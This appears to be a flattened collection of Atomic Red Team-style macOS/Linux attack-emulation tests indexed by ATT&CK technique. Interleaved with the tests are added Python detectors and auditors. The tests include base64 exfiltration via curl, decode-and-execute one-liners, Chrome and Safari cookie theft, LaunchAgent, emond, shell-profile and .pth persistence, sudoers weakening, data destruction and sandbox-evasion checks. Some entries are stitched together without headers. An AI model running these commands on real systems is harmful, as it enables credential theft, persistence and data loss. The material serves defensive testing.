Use screencapture command to collect a full desktop screenshot
screencapture #{output_file}
T1113
bash
macos
Screencapture (silent)
Screen Capture
Use screencapture command to collect a full desktop screenshot
screencapture -x #{output_file}
T1115
bash
macos
Execute commands from clipboard
Clipboard Data
Echo a command to clipboard and execute it
echo ifconfig | pbcopy
$(pbpaste)
T1123
sh
macos
using Quicktime Player
Audio Capture
Use AppleScript to get QuickTime Player to record an audio file from the default microphone. Should create a non-empty m4a file with sound from the microphone. Requires Automation permissions but no additional microphone permissions. Saves the file in /tmp by default; other locations are likely to require more permissions.
sh #(unknown) #{audiofile} #{duration}
T1124
sh
linux, macos
System Time Discovery in FreeBSD/macOS
System Time Discovery
Identify system time. Upon execution, the local computer system time and timezone will be displayed.
date
T1132.001
sh
macos, linux
Base64 Encoded data.
Standard Encoding
Utilizing a common technique for posting base64 encoded data.
echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}
T1135
sh
macos
Network Share Discovery
Network Share Discovery
List mounted filesystems with df, then enumerate SMB shares with smbutil and NFS exports with showmount on the target host.
df -aH
smbutil view -g //#{computer_name}
showmount #{computer_name}
T1136.001
bash
elevated
macos
Create a user account on a MacOS system
Local Account
Creates a user on a MacOS system with dscl
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
T1140
sh
linux, macos
Base64 decoding with Python
Deobfuscate/Decode Files or Information
Use Python to decode a base64-encoded text string and echo it to the console
ENCODED=$(python3 -c 'import base64;enc=base64.b64encode("#{message}".encode());print(enc.decode())')
python3 -c "import base64;dec=base64.b64decode(\"$ENCODED\");print(dec.decode())"
python3 -c "import base64 as d;dec=d.b64decode(\"$ENCODED\");print(dec.decode())"
python3 -c "from base64 import b64decode;dec=b64decode(\"$ENCODED\");print(dec.decode())"
python3 -c "from base64 import b64decode as d;dec=d(\"$ENCODED\");print(dec.decode())"
echo $ENCODED | python3 -c "import base64,sys;dec=base64.b64decode(sys.stdin.read());print(dec.decode())"
echo $ENCODED > #{encoded_file} && python3 -c "import base64;dec=base64.b64decode(open('#{encoded_file}').read());print(dec.decode())"
T1140
sh
linux, macos
Base64 decoding with Perl
Deobfuscate/Decode Files or Information
Use Perl to decode a base64-encoded text string and echo it to the console
ENCODED=$(perl -e "use MIME::Base64;print(encode_base64('#{message}'));")
perl -le "use MIME::Base64;print(decode_base64('$ENCODED'));"
echo $ENCODED | perl -le 'use MIME::Base64;print(decode_base64(<STDIN>));'
echo $ENCODED > #{encoded_file} && perl -le 'use MIME::Base64;open($f,"<","#{encoded_file}");print(decode_base64(<$f>));'
T1140
sh
linux, macos
Base64 decoding with shell utilities
Deobfuscate/Decode Files or Information
Use common shell utilities to decode a base64-encoded text string and echo it to the console
ENCODED=$(echo '#{message}' | base64)
printf $ENCODED | base64 -d
echo $ENCODED | base64 -d
echo $(echo $ENCODED) | base64 -d
echo $ENCODED > #{encoded_file} && base64 -d #{encoded_file}
echo $ENCODED > #{encoded_file} && base64 -d < #{encoded_file}
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d
bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}"
T1140
sh
linux, macos
Hex decoding with shell utilities
Deobfuscate/Decode Files or Information
Use common shell utilities to decode a hex-encoded text string and echo it to the console
ENCODED=$(echo '#{message}' | xxd -ps -c 256)
printf $ENCODED | xxd -r -p
echo $ENCODED | xxd -r -p
echo $(echo $ENCODED) | xxd -r -p
echo $ENCODED > #{encoded_file} && xxd -r -p #{encoded_file}
echo $ENCODED > #{encoded_file} && xxd -r -p < #{encoded_file}
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | xxd -r -p
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | xxd -r -p
T1140
sh
linux, macos
Linux Base64 Encoded Shebang in CLI
Deobfuscate/Decode Files or Information
Using Linux Base64 encoded shell scripts that have a shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as in [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). There is also a good Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it.
echo #{bash_encoded} | base64 -d | bash
echo #{dash_encoded} | base64 -d | bash
echo #{fish_encoded} | base64 -d | bash
echo #{sh_encoded} | base64 -d | bash
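The shebang-in-base64 pattern above is what the linked Sigma rule keys on. As an added example that is not part of this page or of Atomic Red Team, the Python below applies the same idea to process command lines: it finds base64-looking runs next to a base64 decode flag, decodes them, and flags the event when the decoded payload starts with `#!`. The event strings are constructed here to cover the plain `-d`, the `--decode`, and the brace-expansion `{base64,-d}` variants that the T1140 tests on this page use.

```python
import base64
import binascii
import re

# A base64 decode invocation, including the brace-expansion form {base64,-d}
# used in the "Base64 decoding with shell utilities" test.
DECODE_RE = re.compile(r"\bbase64[\s,]+(?:-d|-D|--decode)\b")
# Runs of base64 alphabet long enough to hold a shebang plus a command.
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_blobs(cmdline):
    """Yield (token, payload) for every base64-looking run that decodes cleanly."""
    for tok in BLOB_RE.findall(cmdline):
        try:
            yield tok, base64.b64decode(tok, validate=True)
        except (binascii.Error, ValueError):
            continue


def is_shebang_decode(cmdline):
    """True when the command line decodes base64 and a decoded blob starts with '#!'."""
    if not DECODE_RE.search(cmdline):
        return False
    return any(payload.startswith(b"#!") for _, payload in decoded_blobs(cmdline))


def triage(events):
    """Return the matching events, in their original order."""
    return [e for e in events if is_shebang_decode(e)]


def _b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed sample process command lines (not real telemetry).
SCRIPT_BASH = _b64("#!/bin/bash\necho hi\n")
SCRIPT_SH = _b64("#!/bin/sh\nid\n")
PLAIN_DATA = _b64("hello world, just data")
SAMPLE_EVENTS = [
    "echo " + SCRIPT_BASH + " | base64 -d | bash",            # shebang payload
    "echo " + PLAIN_DATA + " | base64 -d",                    # decode, but no shebang
    "base64 -d /tmp/blob.b64",                                # decode of a file, no inline blob
    'bash -c "{echo,\\"' + SCRIPT_SH + '\\"}|{base64,-d}"',   # brace-expansion variant
    "printf " + SCRIPT_SH + " | base64 --decode | sh",        # long decode flag
    "cat /etc/passwd | grep root",                            # unrelated
]

if __name__ == "__main__":
    for event in triage(SAMPLE_EVENTS):
        print("suspicious:", event)
```

The check deliberately decodes every candidate blob rather than trusting a length heuristic, so a decode of ordinary data (the second sample) is not flagged; a blob that lives in a file rather than on the command line (the third sample) needs file telemetry, which this command-line check cannot provide.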
T1140
bash
linux, macos
XOR decoding and command execution using Python
Deobfuscate/Decode Files or Information
An adversary can obfuscate malicious commands or payloads using XOR and execute them on the victim's machine. This test uses Python to decode and execute commands on the machine.
python3 -c 'import base64, subprocess; from itertools import cycle; xor_decrypt = lambda text, key: "".join(chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()), cycle(key))); command = "#{encrypted_command}"; key = "#{xor_key}"; decoded = xor_decrypt(command, key); subprocess.call(decoded, shell=True)'
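To produce the `encrypted_command` value the test above consumes, and to show what an analyst can do with a captured one, here is an added Python example that is not code from the page or from Atomic Red Team. It XORs the command against a repeating key and base64-encodes the result, decodes it the same way, and recovers the key from a known plaintext prefix, which works because XOR is symmetric: key = ciphertext XOR plaintext. The command and key values are made up for the example.

```python
import base64
from itertools import cycle


def xor_bytes(data, key):
    """XOR data against key, repeating the key as often as needed."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def encrypt_command(command, key):
    """Build the base64 string the test passes as encrypted_command."""
    return base64.b64encode(xor_bytes(command.encode(), key.encode())).decode()


def decrypt_command(encrypted, key):
    """Inverse of encrypt_command; the same operation, since XOR is its own inverse."""
    return xor_bytes(base64.b64decode(encrypted), key.encode()).decode()


def recover_key(encrypted, known_prefix, key_len):
    """Recover a repeating XOR key of length key_len from a known plaintext prefix
    that is at least key_len bytes long (for example an interpreter path)."""
    known = known_prefix.encode()
    if len(known) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    ciphertext = base64.b64decode(encrypted)
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known[:key_len])).decode()


if __name__ == "__main__":
    # Made-up command and key for the demonstration.
    blob = encrypt_command("id > /tmp/xor.txt", "secret")
    print("encrypted_command:", blob)
    print("decoded:", decrypt_command(blob, "secret"))
    print("recovered key:", recover_key(blob, "id > /tmp", 6))
```

The key recovery is the reason a fixed XOR key is obfuscation rather than encryption: once an analyst guesses the first few bytes of the command (a shell path, `curl`, `python3`), the key falls out and every other blob encoded with it can be read.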
T1176
manual
linux, windows, macos
Chrome/Chromium (Developer Mode)
Software Extensions
Turn on Chrome/Chromium developer mode and Load Extension found in the src directory
T1176
manual
linux, windows, macos
Firefox
Software Extensions
Create a file called test.wma, with the duration of 30 seconds
T1176
manual
windows, macos
Edge Chromium Addon - VPN
Software Extensions
Adversaries may use VPN extensions in an attempt to hide traffic sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store.
T1201
bash
macos
Examine password policy - macOS
Password Policy Discovery
Lists the password policy to console on macOS.
pwpolicy getaccountpolicies
T1217
sh
macos
List Mozilla Firefox Bookmark Database Files on macOS
Browser Information Discovery
Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file.
find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> #{output_file} \;
cat #{output_file} 2>/dev/null
T1217
sh
macos
List Google Chrome Bookmark JSON Files on macOS
Browser Information Discovery
Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file.
find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> #{output_file} \;
cat #{output_file} 2>/dev/null
T1217
sh
macos
List Safari Bookmarks on MacOS
Browser Information Discovery
This test searches for Safari's Bookmarks file (on macOS) and lists any found instances to a text file.
find / -path "*/Safari/Bookmarks.plist" 2>/dev/null >> #{output_file}
cat #{output_file}
T1222.002
sh
linux, macos
chmod - Change file or folder mode (numeric mode)
Linux and Mac Permissions
Changes a file or folder's permissions using chmod and a specified numeric mode.
chmod #{numeric_mode} #{file_or_folder}
T1222.002
sh
linux, macos
chmod - Change file or folder mode (symbolic mode)
Linux and Mac Permissions
Changes a file or folder's permissions using chmod and a specified symbolic mode.
chmod #{symbolic_mode} #{file_or_folder}
T1222.002
sh
linux, macos
chmod - Change file or folder mode (numeric mode) recursively
Linux and Mac Permissions
Changes a file or folder's permissions recursively using chmod and a specified numeric mode.
chmod -R #{numeric_mode} #{file_or_folder}
T1222.002
bash
linux, macos
chmod - Change file or folder mode (symbolic mode) recursively
Linux and Mac Permissions
Changes a file or folder's permissions recursively using chmod and a specified symbolic mode.
chmod -R #{symbolic_mode} #{file_or_folder}
T1222.002
bash
macos, linux
chown - Change file or folder ownership and group
Linux and Mac Permissions
Changes a file or folder's ownership and group information using chown.
chown #{owner}:#{group} #{file_or_folder}
T1222.002
bash
macos, linux
chown - Change file or folder ownership and group recursively
Linux and Mac Permissions
Changes a file or folder's ownership and group information recursively using chown.
chown -R #{owner}:#{group} #{file_or_folder}
T1222.002
sh
linux, macos
chown - Change file or folder mode ownership only
Linux and Mac Permissions
Changes a file or folder's ownership only using chown.
chown #{owner} #{file_or_folder}
T1222.002
bash
macos, linux
chown - Change file or folder ownership recursively
Linux and Mac Permissions
Changes a file or folder's ownership only recursively using chown.
chown -R #{owner} #{file_or_folder}
T1222.002
sh
macos, linux
chattr - Remove immutable file attribute
Linux and Mac Permissions
Removes a file's immutable attribute using chattr. This technique was used by the threat actor Rocke during the compromise of Linux web servers. chattr is a Linux utility; on macOS the equivalent is clearing the user immutable flag with chflags nouchg.
chattr -i #{file_to_modify}
T1222.002
sh
macos, linux
Chmod through c script
Linux and Mac Permissions
chmods a file using a c script
#{compiled_file} /tmp/ T1222002
T1222.002
sh
elevated
macos, linux
Chown through c script
Linux and Mac Permissions
chowns a file to root using a c script
sudo #{compiled_file} #{source_file}
T1485
sh
linux, macos
FreeBSD/macOS/Linux - Overwrite file with DD
Data Destruction
Overwrites a file in place using dd, writing as many bytes from the overwrite source as the target file currently holds. The file is not deleted. bs=1 keeps the byte count portable across GNU and BSD dd (iflag=count_bytes exists only in GNU dd). To stop the test, break the command with CTRL/CMD+C.
dd of=#{file_to_overwrite} if=#{overwrite_source} bs=1 count=$(ls -l #{file_to_overwrite} | awk '{print $5}')
T1486
sh
macos
Encrypt files using 7z utility - macOS
Data Encrypted for Impact
This test encrypts the file(s) using the 7z utility
7z a -p #{file_password} -mhe=on #{encrypted_file_name} #{input_file_path}
T1486
sh
macos
Encrypt files using openssl utility - macOS
Data Encrypted for Impact
This test encrypts the file(s) using the openssl utility
openssl enc #{encryption_option} -in #{input_file_path} -out #{output_file_name}
T1490
sh
elevated
macos
Disable Time Machine
Inhibit System Recovery
Disables Time Machine which is Apple's automated backup utility software. Attackers can use this to prevent backups from occurring and hinder the victim's ability to recover from any damage.
sudo tmutil disable
T1496
sh
linux, macos
FreeBSD/macOS/Linux - Simulate CPU Load with Yes
Resource Hijacking
This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break.
yes > /dev/null
T1497.001
sh
macos
Detect Virtualization Environment via ioreg
System Checks
ioreg contains registry entries for all the device drivers in the system. If the host is a virtual machine, one of the device manufacturers will be a virtualization vendor.
if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;
T1497.001
sh
macos
Detect Virtualization Environment using sysctl (hw.model)
System Checks
sysctl hw.model returns the model name of the hardware (Macmini8,1, MacBookAir10,1, etc.) on native Apple hardware but returns the hypervisor name (VMware7,0) in a VM. Note that guests of Apple's Virtualization framework report a model such as VirtualMac2,1, which contains "Mac" and is therefore not flagged by this check. Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model
if [ "$(sysctl -n hw.model | grep -v 'Mac')" != "" ]; then echo 'Virtualization Environment detected'; fi;
T1497.001
sh
macos
Check if System Integrity Protection is enabled
System Checks
The latest versions of macOS have the System Integrity Protection feature (SIP). If a sandbox uses a non-signed kernel extension for monitoring purposes, SIP must be disabled to load this kind of kernel extension, so malware may check whether SIP is enabled. Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip
if [ "$(csrutil status | grep -v 'enabled')" != "" ]; then echo 'Possible Virtualization Environment detected'; fi;
T1497.001
sh
macos
Detect Virtualization Environment using system_profiler
System Checks
system_profiler provides system hardware and software configuration and the Model Identifier should provide the value similar to (sysctl -n hw.model). We should be able to find whether virtualization is enabled by checking whether the Model Identifier does not contain "Mac".
if [ "$(system_profiler SPHardwareDataType | grep "Model Identifier" | grep -v 'Mac')" != "" ]; then echo 'Virtualization Environment detected'; fi;
T1497.003
sh
linux, macos
Delay execution with ping
Time Based Checks
Uses the ping command to introduce a delay before executing a malicious payload.
ping -c #{ping_count} 8.8.8.8 > /dev/null
#{evil_command}
T1518
sh
macos
Find and Display Safari Browser Version
Software Discovery
Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
/usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
T1518.001
sh
macos
Security Software Discovery - ps (macOS)
Security Software Discovery
Identifies security software on the endpoint by listing running processes. Upon successful execution, the shell displays any matching AV/security software processes.
ps aux | egrep 'Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'
T1529
sh
elevated
linux, macos
Restart System via `shutdown` - FreeBSD/macOS/Linux
System Shutdown/Reboot
This test restarts a FreeBSD/macOS/Linux system.
shutdown -r #{timeout}
T1529
sh
elevated
linux, macos
Shutdown System via `shutdown` - FreeBSD/macOS/Linux
System Shutdown/Reboot
This test shuts down a FreeBSD/macOS/Linux system using a halt.
shutdown -h #{timeout}
T1529
sh
elevated
linux, macos
Restart System via `reboot` - FreeBSD/macOS/Linux
System Shutdown/Reboot
This test restarts a FreeBSD/macOS/Linux system via reboot.
reboot
T1531
sh
elevated
macos, linux
Change User Password via passwd
Account Access Removal
This test changes the user password to hinder access to the account using passwd utility.
passwd #{user_account} #enter admin password > enter new password > confirm new password
T1531
sh
elevated
macos
Delete User via dscl utility
Account Access Removal
This test deletes the user account using the dscl utility.
dscl . -delete /Users/#{user_account} #enter admin password
T1531
sh
elevated
macos
Delete User via sysadminctl utility
Account Access Removal
This test deletes the user account using the sysadminctl utility.
sysadminctl -deleteUser #{user_account} #enter admin password
T1539
bash
macos
Steal Chrome Cookies via Remote Debugging (Mac)
Steal Web Session Cookie
The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome's own mechanisms to access cookies. If successful, this test will output a list of cookies. Note: Chrome processes will be killed during this test. See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e
killall 'Google Chrome'
sleep 1
open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/
sleep 1
/tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337
T1539
sh
macos
Copy Safari BinaryCookies files using AppleScript
Steal Web Session Cookie
This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")' -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing' -e 'end tell'
Launch Agent
Create a plist and execute it
if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;
sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename}
sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}
T1543.001
bash
elevated
macos
Event Monitor Daemon Persistence
Launch Agent
This test adds persistence via a plist to execute via the macOS Event Monitor Daemon.
sudo cp #{script_location} #{script_destination}
sudo touch /private/var/db/emondClients/#{empty_file}
T1543.001
bash
elevated
macos
Launch Agent - Root Directory
Launch Agent
Create a plist and execute it
sudo cp #{path_malicious_plist} /Library/LaunchAgents/#{plist_filename}
launchctl load -w /Library/LaunchAgents/#{plist_filename}
Launch Daemon
Utilize LaunchDaemon to launch Hello World
sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
T1546.004
sh
macos, linux
Add command to .bash_profile
Unix Shell Configuration Modification
Adds a command to the .bash_profile file of the current user
echo '#{command_to_add}' >> ~/.bash_profile
T1546.004
sh
macos, linux
Add command to .bashrc
Unix Shell Configuration Modification
Adds a command to the .bashrc file of the current user
echo '#{command_to_add}' >> ~/.bashrc
Trap
Launch bash shell with command arg to create TRAP on EXIT. The trap executes script that writes to /tmp/art-fish.txt
bash -c 'trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" EXIT'
Trap
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. The trap executes script that writes to /tmp/art-fish.txt
bash -c 'trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" SIGINT && kill -SIGINT $$'
T1546.014
sh
elevated
macos
Persistence with Event Monitor - emond
Emond
Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
sudo cp "#{plist}" /etc/emond.d/rules/T1546.014_emond.plist
sudo touch /private/var/db/emondClients/T1546.014
T1546.018
sh
macos
Python Startup Hook - atomic_hook.pth (macOS)
Python Startup Hooks
Creates a Python startup hook using a .pth file inside a virtual environment on macOS.
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
$PYTHON_EXE -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
T1546.018
sh
linux, macos
Python Startup Hook - usercustomize.py (Linux / MacOS)
Python Startup Hooks
Executes code via usercustomize.py. This is a per-user persistence mechanism that does not require root privileges.
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
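The two tests above rely on site.py executing, at interpreter start, any `import` line in a `.pth` file and any `usercustomize.py`/`sitecustomize.py` module found on the site path. As an added example that is not from the page or from Atomic Red Team, the Python below audits those locations: it lists the directories the running interpreter hands to site.py and flags `.pth` lines that begin with `import` as well as the startup modules. The `demo()` function builds a throw-away directory with constructed benign and hooking files so the scanner can be exercised offline; the file contents are made up.

```python
import os
import site
import tempfile

STARTUP_MODULES = ("usercustomize.py", "sitecustomize.py")


def scan_dir(directory):
    """Return (path, reason) findings for one site-packages style directory."""
    findings = []
    if not os.path.isdir(directory):
        return findings
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if name in STARTUP_MODULES:
            findings.append((path, "startup module imported by site.py"))
        elif name.endswith(".pth"):
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    # site.py treats only lines beginning with "import " or
                    # "import\t" as code; every other line is a path entry.
                    if line.startswith(("import ", "import\t")):
                        findings.append((path, "line %d executes: %s" % (lineno, line.strip())))
    return findings


def hook_dirs():
    """Directories the running interpreter hands to site.py at startup."""
    dirs = list(site.getsitepackages()) if hasattr(site, "getsitepackages") else []
    dirs.append(site.getusersitepackages())
    return dirs


def audit():
    """Scan every hook directory of the current interpreter."""
    findings = []
    for d in hook_dirs():
        findings.extend(scan_dir(d))
    return findings


def demo():
    """Exercise the scanner on a constructed directory: one benign .pth holding a
    path entry, one .pth that runs code, and a usercustomize.py."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "benign.pth"), "w") as fh:
            fh.write("/opt/vendor/lib\n")
        with open(os.path.join(d, "hook.pth"), "w") as fh:
            fh.write("import os; os.system('date > /tmp/poc.txt')\n")
        with open(os.path.join(d, "usercustomize.py"), "w") as fh:
            fh.write("print('hooked')\n")
        return [(os.path.basename(p), reason) for p, reason in scan_dir(d)]


if __name__ == "__main__":
    for path, reason in audit() or [("-", "no hooks found")]:
        print(path, reason)
```

Run it with every interpreter that matters on the host (system Python, Homebrew Python, each virtual environment), because each one consults its own site-packages; a hook planted in one venv, as the first test does, is invisible to an audit run from another.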
T1547.006
bash
elevated
macos
MacOS - Load Kernel Module via kextload and kmutil
Kernel Modules and Extensions
This test uses the kextload and kmutil commands to load and unload a MacOS kernel module.
set -x
sudo kextload #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload #{module_path}
sudo kmutil load -p #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kmutil unload -p #{module_path}
T1547.006
bash
elevated
macos
MacOS - Load Kernel Module via KextManagerLoadKextWithURL()
Kernel Modules and Extensions
This test uses the IOKit API to load a kernel module for macOS. Hardcoded to use the SoftRAID kext.
sudo #{exe_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload /Library/Extensions/SoftRAID.kext
T1547.007
sh
macos
Copy in loginwindow.plist for Re-Opened Applications
Re-opened Applications
Copy in new loginwindow.plist to launch Calculator.
cp #{calc_plist_path} ~/Library/Preferences/ByHost/com.apple.loginwindow.plist
T1547.007
sh
elevated
macos
Re-Opened Applications using LoginHook
Re-opened Applications
Mac Defaults [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)
sudo defaults write com.apple.loginwindow LoginHook #{script}
T1547.007
sh
macos
Append to existing loginwindow for Re-Opened Applications
Re-opened Applications
Appends an entry that launches Calculator to the hidden loginwindow.*.plist for the next login. Note that the change may not result in Calculator launching on the next user login; it depends on which version of macOS you are running.
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi
echo save backup copy to /tmp/
cp ${FILE} /tmp/t1547007_loginwindow-backup.plist
echo before
plutil -p ${FILE}
echo overwriting...
#{exe_path} ${FILE} && echo after && plutil -p ${FILE}
T1547.015
bash
macos
Add macOS LoginItem using Applescript
Login Items
Runs osascript on a file to create a new LoginItem for the current user. NOTE: this will pop up a dialog prompting the user to Allow or Deny Terminal.app to control "System Events", so it cannot be automated until the TCC permission is granted. The login item launches Safari.app when the user logs in; a cleanup script removes it. In addition to the osascript process events, file modification events on /Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm should be seen.
osascript #{scriptfile}
T1548.001
sh
elevated
macos, linux
Make and modify binary from C source
Setuid and Setgid
Make, change owner, and change file attributes on a C source code file
cp #{payload} /tmp/hello.c
sudo chown root /tmp/hello.c
sudo make /tmp/hello
sudo chown root /tmp/hello
sudo chmod u+s /tmp/hello
/tmp/hello
T1548.001
sh
elevated
macos, linux
Set a SetUID flag on file
Setuid and Setgid
This test sets the SetUID flag on a file on a Linux or macOS system.
sudo touch #{file_to_setuid}
sudo chown root #{file_to_setuid}
sudo chmod u+xs #{file_to_setuid}
T1548.001
sh
elevated
macos, linux
Set a SetGID flag on file
Setuid and Setgid
This test sets the SetGID flag on a file in Linux and macOS.
sudo touch #{file_to_setuid}
sudo chown root #{file_to_setuid}
sudo chmod g+xs #{file_to_setuid}
T1548.003
sh
elevated
macos, linux
Sudo usage
Sudo and Sudo Caching
Common Sudo enumeration methods.
sudo -l
sudo cat /etc/sudoers
sudo vim /etc/sudoers
T1548.003
sh
elevated
macos, linux
Unlimited sudo cache timeout
Sudo and Sudo Caching
Sets the sudo caching timestamp_timeout to -1, which means the cached credential never expires. This is dangerous to modify without using 'visudo'; do not do this on a production system. Note that the sed replaces everything after env_reset on that line, so any other options listed on the same Defaults line are lost.
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
T1548.003
sh
elevated
macos, linux
Disable tty_tickets for sudo caching
Sudo and Sudo Caching
Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
sudo visudo -c -f /etc/sudoers
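Both tests above weaken /etc/sudoers in ways that `visudo -c` accepts, because the file stays syntactically valid. As an added example that is not the page's or Atomic Red Team's code, the Python below audits sudoers text for those settings and for NOPASSWD rules, joins backslash-continued lines the way sudo does, and shows the corrected values beside the weak ones through `harden()`. The sudoers content is constructed for the example.

```python
import re

WEAK_SETTINGS = [
    (re.compile(r"^\s*Defaults\b.*\btimestamp_timeout\s*=\s*-1\b"),
     "timestamp_timeout=-1: cached sudo credentials never expire"),
    (re.compile(r"^\s*Defaults\b.*!\s*tty_tickets\b"),
     "!tty_tickets: one cached credential is valid from every terminal"),
    (re.compile(r"^\s*Defaults\b.*!\s*authenticate\b"),
     "!authenticate: sudo never asks for a password"),
    (re.compile(r"\bNOPASSWD\b"),
     "NOPASSWD: rule runs without a password"),
]


def logical_lines(text):
    """Yield (first_line_number, joined_text), folding backslash continuations."""
    buf, start = "", None
    for number, raw in enumerate(text.splitlines(), 1):
        if start is None:
            start = number
        stripped = raw.rstrip()
        if stripped.endswith("\\"):
            buf += stripped[:-1] + " "
            continue
        yield start, buf + raw
        buf, start = "", None
    if buf:
        yield start, buf


def audit_sudoers(text):
    """Return (line_number, reason, text) for every weak setting found."""
    findings = []
    for number, line in logical_lines(text):
        body = line.strip()
        # '#' starts a comment unless it is #include / #includedir.
        if body.startswith("#") and not body.startswith("#include"):
            continue
        for pattern, reason in WEAK_SETTINGS:
            if pattern.search(line):
                findings.append((number, reason, body))
    return findings


def harden(text):
    """Replace the cache-weakening settings with conservative values.
    NOPASSWD rules are left alone: each one needs a human decision."""
    text = re.sub(r"\btimestamp_timeout\s*=\s*-1\b", "timestamp_timeout=5", text)
    text = re.sub(r"!\s*tty_tickets\b", "tty_tickets", text)
    text = re.sub(r"!\s*authenticate\b", "authenticate", text)
    return text


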